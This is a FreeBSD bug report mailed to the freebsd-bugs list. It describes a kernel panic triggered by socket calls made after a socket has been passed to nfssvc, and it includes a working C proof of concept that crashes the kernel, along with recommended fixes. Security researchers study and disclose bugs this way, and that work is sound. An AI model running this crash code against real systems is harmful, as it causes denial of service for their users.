[Bug 217463] socket calls can cause panic after passing socket to nfssvc

bugzilla-noreply at freebsd.org bugzilla-noreply at freebsd.org
Wed Mar 1 20:52:41 UTC 2017 

https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=217463

            Bug ID: 217463
           Summary: socket calls can cause panic after passing socket to
                    nfssvc
           Product: Base System
           Version: 10.3-RELEASE
          Hardware: Any
                OS: Any
            Status: New
          Severity: Affects Some People
          Priority: ---
         Component: kern
          Assignee: freebsd-bugs at FreeBSD.org
          Reporter: tim.newsham at nccgroup.trust

/*
 * concrash.c
 *     Cause a panic using nfssvc system call after it receives a socket

Description:
When you pass a socket to the NFS subsystem in the kernel, it
uses nfscbd_addsock() to claim the socket.  This results in the
fp->f_data being set to zero.  If this socket is later used in
"normal" socket system calls that access f_data, a NULL pointer
dereference will result in a kernel panic.

This is triggerable through many system calls such as
getsockopt, setsockopt, connect, listen, bind, send,
recv and nfssvc itself.

This is of low risk since it requires access to privileged
operations in the nfssvc system call.

Recommendation:
Consider updating getsock_cap to return an error if f_type is DTYPE_SOCKET
but f_data is NULL.  This indicates that the socket has been stolen
by the kernel.

Update all socket operations that access f_data to first check
if f_data is NULL and return an error in this case.
 */


#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>

#include <sys/param.h>
#include <sys/mount.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <fs/nfs/nfskpiport.h>
#include <fs/nfs/nfsproto.h>
#include <fs/nfs/nfs.h>
#include <nfs/nfssvc.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    struct nfscbd_args args;
    char buf[8] = {0};
    int fd, x;

    fd = socket(AF_INET6, SOCK_STREAM, 0);
    if(fd == -1) exit(1);
    printf("fd %d\n", fd);

    // give it over to the kernel
    args.sock = fd;
    x = nfssvc(NFSSVC_CBADDSOCK, &args);
    printf("nfssvc %d\n", x);

    x = connect(fd, (struct sockaddr *)buf, 5);
    printf("res %d\n", x);
    return 0;
}

-- 
You are receiving this mail because:
You are the assignee for the bug.

More information about the freebsd-bugs mailing list